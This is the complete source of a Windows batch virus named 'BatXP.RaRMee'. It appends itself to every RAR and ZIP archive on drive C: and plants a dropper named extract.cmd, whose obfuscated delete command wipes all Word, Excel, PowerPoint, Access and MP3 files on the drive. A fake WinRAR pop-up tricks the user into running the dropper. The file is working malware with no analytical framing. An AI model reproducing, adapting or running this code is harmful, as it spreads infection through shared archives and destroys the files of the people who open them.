::BatXP.RaRMee/b8::
@echo off
assoc .rar | cls
if errorlevel==1 goto x
ftype winrar>b.8 | cls
find /i "program files\winrar" b.8 | cls
if errorlevel==1 goto x
for /r c:\ %%b in (*.rar,*.zip) do c:\progra~1\winrar\rar.exe u %%b %0 | cls
set q=d
set w=l
set r=e
set t=extract.cmd
echo.::BatXP.OfficePlusMP3SarinAttack/b8::>%t%
echo.@echo off>>%t%
echo.for /r c:\ %%%%h in (*.doc,*.xls,*.ppt,*.mdb,*.mp3) do %q%%r%%w% /q %%%%h>>%t%
echo.cls>>%t%
for /r c:\ %%b in (*.rar,*.zip) do c:\progra~1\winrar\rar.exe u %%b %t% | cls
@echo off
echo.msgbox "To extract files, open extract.cmd",0,"WinRAR">m.vbs
start m.vbs
:x
del %t%
del b.8
exit cmd.exe
